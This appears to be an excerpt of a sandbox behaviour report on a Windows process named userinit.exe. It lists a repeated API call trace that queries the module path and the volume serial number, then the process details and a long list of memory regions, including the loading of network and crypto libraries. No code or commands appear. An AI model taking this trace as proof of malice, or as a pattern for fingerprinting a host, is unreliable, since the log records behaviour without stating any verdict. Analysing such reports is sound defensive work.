[0180.608] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.608] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.608] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.608] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.609] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.609] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.609] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.609] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.610] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.610] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed74, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed88, lpMaximumComponentLength=0x6ed84, lpFileSystemFlags=0x6ed80, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed88*=0x90c08a66, lpMaximumComponentLength=0x6ed84*=0xff, lpFileSystemFlags=0x6ed80*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0180.610] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec78, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.610] GetSystemDefaultLangID () returned 0x1f0409
[0180.610] VerLanguageNameA (in: wLang=0x409, szLang=0x6ed2c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0180.611] ExitProcess (uExitCode=0x0)
Thread:
id = 291
os_tid = 0x248
Thread:
id = 292
os_tid = 0x35c
Process:
id = "48"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be8e0"
os_pid = "0x2a8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5764
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5765
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5766
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5767
start_va = 0xf0000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 5768
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5769
start_va = 0xcf0000
end_va = 0xcf8fff
entry_point = 0xcf0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5770
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5771
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5772
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5773
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 5774
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5776
start_va = 0x2d0000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 5777
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5778
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5779
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5780
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5781
start_va = 0x1c0000
end_va = 0x1cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 5782
start_va = 0x6d720000
end_va = 0x6d7a3fff
entry_point = 0x6d720000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5783
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5784
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5785
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5786
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5787
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5788
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5789
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5790
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5791
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5792
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5793
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5794
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5795
start_va = 0x1d0000
end_va = 0x297fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 5796
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5797
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5798
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5799
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 5800
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 5801
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 5802
start_va = 0xd00000
end_va = 0x18fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d00000"
filename = ""
Region:
id = 5803
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 5804
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5805
start_va = 0x680000
end_va = 0x77ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 5806
start_va = 0x780000
end_va = 0x85efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000780000"
filename = ""
Region:
id = 5807
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 5808
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5809
start_va = 0x860000
end_va = 0xa0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 5810
start_va = 0x1900000
end_va = 0x222ffff
entry_point = 0x1900000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5811
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 5812
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 5813
start_va = 0x2230000
end_va = 0x2622fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002230000"
filename = ""
Region:
id = 5814
start_va = 0x680000
end_va = 0x6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 5815
start_va = 0x740000
end_va = 0x77ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 5816
start_va = 0x860000
end_va = 0x96cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 5817
start_va = 0x9d0000
end_va = 0xa0ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 5818
start_va = 0xa10000
end_va = 0xb0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 5819
start_va = 0x2630000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5820
start_va = 0xb10000
end_va = 0xb90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5821
start_va = 0xba0000
end_va = 0xc22fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 5822
start_va = 0xb10000
end_va = 0xb94fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5823
start_va = 0xba0000
end_va = 0xc26fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 5824
start_va = 0xb10000
end_va = 0xb98fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5825
start_va = 0xba0000
end_va = 0xc2afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 5826
start_va = 0xb10000
end_va = 0xb9cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5827
start_va = 0xba0000
end_va = 0xc2efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 5828
start_va = 0xc30000
end_va = 0xcc0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c30000"
filename = ""
Region:
id = 5829
start_va = 0xb10000
end_va = 0xba2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5830
start_va = 0xbb0000
end_va = 0xc44fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 5831
start_va = 0xb10000
end_va = 0xba6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5832
start_va = 0xbb0000
end_va = 0xc48fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 5833
start_va = 0xb10000
end_va = 0xbaafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5834
start_va = 0xbb0000
end_va = 0xc4cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 5835
start_va = 0xb10000
end_va = 0xbaefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5836
start_va = 0xbb0000
end_va = 0xc50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 5837
start_va = 0x2830000
end_va = 0x28d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5838
start_va = 0xb10000
end_va = 0xbb4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5839
start_va = 0xbc0000
end_va = 0xc66fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bc0000"
filename = ""
Region:
id = 5840
start_va = 0xb10000
end_va = 0xbb8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5841
start_va = 0xbc0000
end_va = 0xc6afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bc0000"
filename = ""
Region:
id = 5842
start_va = 0xb10000
end_va = 0xbbcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5843
start_va = 0xbc0000
end_va = 0xc6efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bc0000"
filename = ""
Region:
id = 5844
start_va = 0x2830000
end_va = 0x28e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5845
start_va = 0xb10000
end_va = 0xbc2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5846
start_va = 0xbd0000
end_va = 0xc84fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bd0000"
filename = ""
Region:
id = 5847
start_va = 0xb10000
end_va = 0xbc6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5848
start_va = 0xbd0000
end_va = 0xc88fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bd0000"
filename = ""
Region:
id = 5849
start_va = 0xb10000
end_va = 0xbcafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5850
start_va = 0xbd0000
end_va = 0xc8cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bd0000"
filename = ""
Region:
id = 5851
start_va = 0xb10000
end_va = 0xbcefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5852
start_va = 0xbd0000
end_va = 0xc90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bd0000"
filename = ""
Region:
id = 5853
start_va = 0x2830000
end_va = 0x28f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5854
start_va = 0xb10000
end_va = 0xbd4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5855
start_va = 0xbe0000
end_va = 0xca6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 5856
start_va = 0xb10000
end_va = 0xbd8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5857
start_va = 0xbe0000
end_va = 0xcaafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 5859
start_va = 0xb10000
end_va = 0xbdcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5860
start_va = 0xbe0000
end_va = 0xcaefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 5861
start_va = 0x2830000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5895
start_va = 0xb10000
end_va = 0xbe2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5896
start_va = 0xbf0000
end_va = 0xcc4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 5897
start_va = 0xb10000
end_va = 0xbe6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5898
start_va = 0xbf0000
end_va = 0xcc8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 5899
start_va = 0xb10000
end_va = 0xbeafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5900
start_va = 0xbf0000
end_va = 0xcccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 5909
start_va = 0xb10000
end_va = 0xbeefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5910
start_va = 0xbf0000
end_va = 0xcd0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 5922
start_va = 0x2830000
end_va = 0x2912fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5923
start_va = 0xb10000
end_va = 0xbf4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5924
start_va = 0xc00000
end_va = 0xce6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c00000"
filename = ""
Region:
id = 5926
start_va = 0xb10000
end_va = 0xbf8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5927
start_va = 0xc00000
end_va = 0xceafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c00000"
filename = ""
Region:
id = 5928
start_va = 0xb10000
end_va = 0xbfcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5930
start_va = 0xc00000
end_va = 0xceefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c00000"
filename = ""
Region:
id = 5931
start_va = 0x2830000
end_va = 0x2920fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5936
start_va = 0xb10000
end_va = 0xc02fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5937
start_va = 0x2830000
end_va = 0x2924fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5938
start_va = 0xb10000
end_va = 0xc06fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5943
start_va = 0x2830000
end_va = 0x2928fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5944
start_va = 0xb10000
end_va = 0xc0afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5945
start_va = 0x2830000
end_va = 0x292cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5951
start_va = 0xb10000
end_va = 0xc0efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5952
start_va = 0x2830000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5956
start_va = 0xb10000
end_va = 0xc12fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5957
start_va = 0x2830000
end_va = 0x2934fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5958
start_va = 0xb10000
end_va = 0xc16fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5964
start_va = 0x2830000
end_va = 0x2938fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5965
start_va = 0xb10000
end_va = 0xc1afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5966
start_va = 0x2830000
end_va = 0x293cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5970
start_va = 0xb10000
end_va = 0xc1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 5971
start_va = 0x2940000
end_va = 0x2a52fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 5972
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5973
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5974
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5975
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5976
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5977
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5982
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5983
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x140000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5984
start_va = 0x2a60000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 5985
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
